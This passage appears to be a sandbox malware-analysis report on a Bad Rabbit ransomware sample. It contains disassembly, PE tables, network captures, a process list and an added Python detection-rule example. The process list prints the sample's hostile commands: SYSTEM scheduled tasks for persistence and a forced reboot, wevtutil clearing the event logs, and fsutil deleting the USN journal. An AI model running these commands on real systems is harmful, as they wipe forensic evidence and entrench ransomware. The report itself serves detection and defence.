                                                                    je 00007F327C7E0D0Eh
                                                                    cmp dword ptr [ebp-00001250h], 01h
                                                                    jne 00007F327C7E0BB3h
                                                                    xor eax, eax
                                                                    lea ebx, dword ptr [ebx+00000000h]
                                                                    movzx ecx, word ptr [eax+00406CF0h]
                                                                    mov word ptr [ebp+eax-0000124Ch], cx
                                                                    add eax, 02h
                                                                    test cx, cx
                                                                    jne 00007F327C7E0B7Bh
                                                                    jmp 00007F327C7E0BE8h
                                                                    mov eax, dword ptr [esi]
                                                                    push eax
                                                                    push edi
                                                                    call dword ptr [00404060h]
                                                                    mov ecx, dword ptr [esi]
                                                                    add esp, 08h
                                                                    lea esi, dword ptr [ecx+02h]
                                                                    jmp 00007F327C7E0B95h
                                                                    lea ecx, dword ptr [ecx+00h]
                                                                    mov dx, word ptr [ecx]
                                                                    add ecx, 02h
                                                                    test dx, dx
                                                                    jne 00007F327C7E0B87h
                                                                    sub ecx, esi
                                                                    sar ecx, 1
                                                                    cmp word ptr [eax+ecx*2], 0022h
                                                                    lea eax, dword ptr [eax+ecx*2]
                                                                    jne 00007F327C7E0B95h
                                                                    add eax, 02h
                                                                    cmp word ptr [eax], 0020h
                                                                    jne 00007F327C7E0B95h
                                                                    add eax, 02h
                                                                    lea edx, dword ptr [ebp-0000124Ch]
                                                                    sub edx, eax
                                                                    lea ecx, dword ptr [ecx+00h]
                                                                    movzx ecx, word ptr [eax]
                                                                    mov word ptr [edx+eax], cx
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [ASM] VS2008 SP1 build 30729
                                                                    • [ C ] VS2013 UPD5 build 40629
                                                                    • [ASM] VS2013 UPD5 build 40629
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [LNK] VS2010 SP1 build 40219
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6d8c | 0x64 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9000 | 0x7088 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x689a3 | 0x3488 | -
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11000 | 0x1a8 | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x4000 | 0x74 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x1000 | 0x2ed3 | 0x3000 | 098c323b1a59bcf15c1feb8055e58931 | False | 0.6101888020833334 | data | 6.5841037789243835 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0x4000 | 0x302a | 0x3200 | 9cc3629beb9d1f37932d860de2e3a4f5 | False | 0.81 | data | 7.1772588683417196 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0x8000 | 0x33c | 0x200 | 4e5d61b2bd73632f0225e39a2e2c5144 | False | 0.048828125 | data | 0.1833387916558982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc | 0x9000 | 0x7088 | 0x7200 | 256c5e23a9ad8a276128f84017b2d79d | False | 0.16615268640350878 | data | 4.204085780982396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x11000 | 0x24e | 0x400 | 26cd68101ade4e5f70ab3cd5f35e0ad5 | False | 0.41796875 | data | 3.293138685594118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                    RT_ICON | 0x9254 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.20309168443496803
                                                                    RT_ICON | 0xa0fc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.21931407942238268
                                                                    RT_ICON | 0xa9a4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.2203757225433526
                                                                    RT_ICON | 0xaf0c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.19230769230769232
                                                                    RT_ICON | 0xbfb4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.14014522821576764
                                                                    RT_ICON | 0xe55c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.19230769230769232
                                                                    RT_ICON | 0xf604 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.39893617021276595
                                                                    RT_GROUP_ICON | 0xfa6c | 0x68 | data | English | United States | 0.6826923076923077
                                                                    RT_VERSION | 0xfad4 | 0x450 | data | English | United States | 0.37681159420289856
                                                                    RT_MANIFEST | 0xff24 | 0x161 | ASCII text, with CRLF line terminators | English | United States | 0.5495750708215298
                                                                    DLL | Import
                                                                    KERNEL32.dll | ExitProcess, GetCommandLineW, GetFileSize, CreateProcessW, HeapAlloc, HeapFree, GetModuleHandleW, GetProcessHeap, WriteFile, GetSystemDirectoryW, ReadFile, GetModuleFileNameW, CreateFileW, lstrcatW, CloseHandle, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter
                                                                    USER32.dll | wsprintfW
                                                                    SHELL32.dll | CommandLineToArgvW
                                                                    msvcrt.dll | wcsstr, memcpy, free, malloc
                                                                    Language of compilation system | Country where language is spoken
                                                                    English | United States
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Jan 14, 2025 23:25:54.175013065 CET | 49749 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.179801941 CET | 445 | 49749 | 173.222.162.32 | 192.168.2.4
                                                                    Jan 14, 2025 23:25:54.179853916 CET | 49749 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.181539059 CET | 49749 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.188220024 CET | 445 | 49749 | 173.222.162.32 | 192.168.2.4
                                                                    Jan 14, 2025 23:25:54.204817057 CET | 49752 | 80 | 192.168.2.4 | 192.168.2.1
                                                                    Jan 14, 2025 23:25:54.247684956 CET | 49753 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.252549887 CET | 445 | 49753 | 173.222.162.32 | 192.168.2.4
                                                                    Jan 14, 2025 23:25:54.252646923 CET | 49753 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.252840996 CET | 49753 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:54.257594109 CET | 445 | 49753 | 173.222.162.32 | 192.168.2.4
                                                                    Jan 14, 2025 23:25:55.137398005 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:55.215500116 CET | 49752 | 80 | 192.168.2.4 | 192.168.2.1
                                                                    Jan 14, 2025 23:25:57.215562105 CET | 49752 | 80 | 192.168.2.4 | 192.168.2.1
                                                                    Jan 14, 2025 23:25:58.439310074 CET | 49672 | 443 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:25:58.539627075 CET | 49753 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:26:15.560993910 CET | 445 | 49749 | 173.222.162.32 | 192.168.2.4
                                                                    Jan 14, 2025 23:26:15.561197042 CET | 49749 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Jan 14, 2025 23:26:15.561197996 CET | 49749 | 445 | 192.168.2.4 | 173.222.162.32
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Jan 14, 2025 23:26:14.503911018 CET | 61568 | 53 | 192.168.2.4 | 1.1.1.1
                                                                    Jan 14, 2025 23:28:14.154046059 CET | 54526 | 53 | 192.168.2.4 | 1.1.1.1
                                                                    Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                                                    Jan 14, 2025 23:25:54.204912901 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                                                    Jan 14, 2025 23:25:55.215593100 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                                                    Jan 14, 2025 23:25:57.215662003 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                                                    Jan 14, 2025 23:26:12.093116999 CET | 192.168.2.4 | 192.168.2.1 | 8270 | (Port unreachable) | Destination Unreachable
                                                                    Jan 14, 2025 23:27:32.165023088 CET | 192.168.2.4 | 192.168.2.1 | 8270 | (Port unreachable) | Destination Unreachable
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Jan 14, 2025 23:26:14.503911018 CET | 192.168.2.4 | 1.1.1.1 | 0x3b4 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:28:14.154046059 CET | 192.168.2.4 | 1.1.1.1 | 0x16e6 | Standard query (0) | tse1.mm.bing.net | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Jan 14, 2025 23:26:14.510740995 CET | 1.1.1.1 | 192.168.2.4 | 0x3b4 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:26:46.625550032 CET | 1.1.1.1 | 192.168.2.4 | 0x92f0 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:26:46.625550032 CET | 1.1.1.1 | 192.168.2.4 | 0x92f0 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:28:14.160909891 CET | 1.1.1.1 | 192.168.2.4 | 0x16e6 | No error (0) | tse1.mm.bing.net | mm-mm.bing.net.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:28:14.160909891 CET | 1.1.1.1 | 192.168.2.4 | 0x16e6 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.27.10 | A (IP address) | IN (0x0001) | false
                                                                    Jan 14, 2025 23:28:14.160909891 CET | 1.1.1.1 | 192.168.2.4 | 0x16e6 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.28.10 | A (IP address) | IN (0x0001) | false

                                                                    Target ID:0
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Users\user\Desktop\download.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\download.exe"
                                                                    Imagebase:0xc00000
                                                                    File size:441'899 bytes
                                                                    MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                    Imagebase:0xc0000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, Author: Christiaan Beek
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\2594.tmp
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}
                                                                    Imagebase:0x7ff73cfc0000
                                                                    File size:62'328 bytes
                                                                    MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Setup
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl System
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Security
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:wevtutil cl Application
                                                                    Imagebase:0xae0000
                                                                    File size:208'384 bytes
                                                                    MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:17:25:53
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\fsutil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:fsutil usn deletejournal /D C:
                                                                    Imagebase:0x4d0000
                                                                    File size:167'440 bytes
                                                                    MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true
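The process entries above spell out the chain the Sigma hits in the signature section key on: rundll32 loading C:\Windows\infpub.dat (a DLL with a spoofed extension), schtasks creating the SYSTEM tasks rhaegal (run dispci.exe at boot) and drogon (forced reboot at 17:43), wevtutil clearing the Setup, System, Security and Application logs, and fsutil deleting the USN journal on C:. The Python below is an added example, the editor's own code rather than anything from Joe Sandbox, Sigma or the sample, that runs equivalent detection rules over process-creation records constructed from the command lines in this report. The record format (pid/image/cmdline dicts, with pid reusing the report's Target IDs), the rule names and the chain heuristic are assumptions for illustration.

```python
"""Detection rules over process-creation records modelled on this report's process list.

Added example (editor's own code, not Joe Sandbox, Sigma or the sample's code).
Assumed record format: {"pid": int, "image": str, "cmdline": str}.
"""
import re
from dataclasses import dataclass

# Constructed sample: command lines copied from the process list above; "pid"
# reuses the report's Target IDs and is otherwise an assumption.
SAMPLE_EVENTS = [
    {"pid": 2, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"},
    {"pid": 5, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"schtasks /Delete /F /TN rhaegal"},
    {"pid": 9, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"'},
    {"pid": 13, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00'},
    {"pid": 16, "image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmdline": "wevtutil cl Setup"},
    {"pid": 17, "image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmdline": "wevtutil cl System"},
    {"pid": 18, "image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"pid": 19, "image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmdline": "wevtutil cl Application"},
    {"pid": 20, "image": r"C:\Windows\SysWOW64\fsutil.exe", "cmdline": "fsutil usn deletejournal /D C:"},
]

# A double-quoted token (honouring \" escapes, as in the rhaegal /TR value) or a bare token.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|\S+')
WEVTUTIL_RE = re.compile(r'(?i)\bwevtutil(?:\.exe)?"?\s+(?:cl|clear-log)\s+(\S+)')
FSUTIL_RE = re.compile(r'(?i)\bfsutil(?:\.exe)?"?\s+usn\s+deletejournal\b')
# First rundll32 argument up to the ",ordinal" separator: the module being loaded.
RUNDLL32_RE = re.compile(r'(?i)\brundll32(?:\.exe)?"?\s+("[^"]+"|[^\s,]+)')


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def unquote(tok):
    """Strip one layer of double quotes and unescape \\" inside it."""
    if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
        return tok[1:-1].replace('\\"', '"')
    return tok


def parse_switches(cmdline):
    """Map schtasks /SWITCH names (upper-cased) to their value, or True for bare flags."""
    tokens = TOKEN_RE.findall(cmdline)
    switches, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].upper()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                switches[name] = unquote(tokens[i + 1])
                i += 2
                continue
            switches[name] = True
        i += 1
    return switches


def check_event(ev):
    """Apply the rules that fit the image name; return zero or more findings."""
    pid, image, cmd = ev["pid"], ev["image"].lower(), ev["cmdline"]
    out = []
    if image.endswith("wevtutil.exe"):
        m = WEVTUTIL_RE.search(cmd)
        if m:
            out.append(Finding(pid, "event_log_clear", m.group(1)))
    elif image.endswith("fsutil.exe"):
        if FSUTIL_RE.search(cmd):
            out.append(Finding(pid, "usn_journal_delete", cmd))
    elif image.endswith("rundll32.exe"):
        m = RUNDLL32_RE.search(cmd)
        if m:
            module = m.group(1).strip('"')
            ext = module.rsplit(".", 1)[-1].lower() if "." in module else ""
            if ext != "dll":  # Sigma "Execute DLL with spoofed extension" idea
                out.append(Finding(pid, "rundll32_non_dll_module", module))
    elif image.endswith("schtasks.exe"):
        sw = parse_switches(cmd)
        if "CREATE" in sw:
            if str(sw.get("RU", "")).upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
                out.append(Finding(pid, "schtasks_system_task", f'{sw.get("TN")} -> {sw.get("TR")}'))
            tr = str(sw.get("TR", ""))
            if "shutdown" in tr.lower() and re.search(r"(?:^|\s)/r(?:\s|$)", tr):
                out.append(Finding(pid, "scheduled_forced_reboot", str(sw.get("TN", ""))))
    return out


def analyze(events):
    return [f for ev in events for f in check_event(ev)]


def looks_like_antiforensics_chain(findings):
    """Log wipe + journal wipe + scheduled reboot together: the pattern in this report."""
    rules = {f.rule for f in findings}
    return {"event_log_clear", "usn_journal_delete", "scheduled_forced_reboot"} <= rules


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for f in results:
        print(f"pid {f.pid:>3}  {f.rule:<26} {f.detail}")
    print("anti-forensics chain:", looks_like_antiforensics_chain(results))
```

Run against the constructed records it yields nine findings: the non-DLL module for Target 2, a SYSTEM task for Targets 9 and 13 (the latter also as a forced reboot), one log clear per wevtutil instance and the journal deletion; the plain `schtasks /Delete` of Target 5 is not flagged. In production the same rules would consume Sysmon Event ID 1 or Security 4688 records, and the chain check is only useful when the records are correlated on a host and time window.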

                                                                    Target ID:21
                                                                    Start time:17:25:54
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit
                                                                    Imagebase:0x7ff603690000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
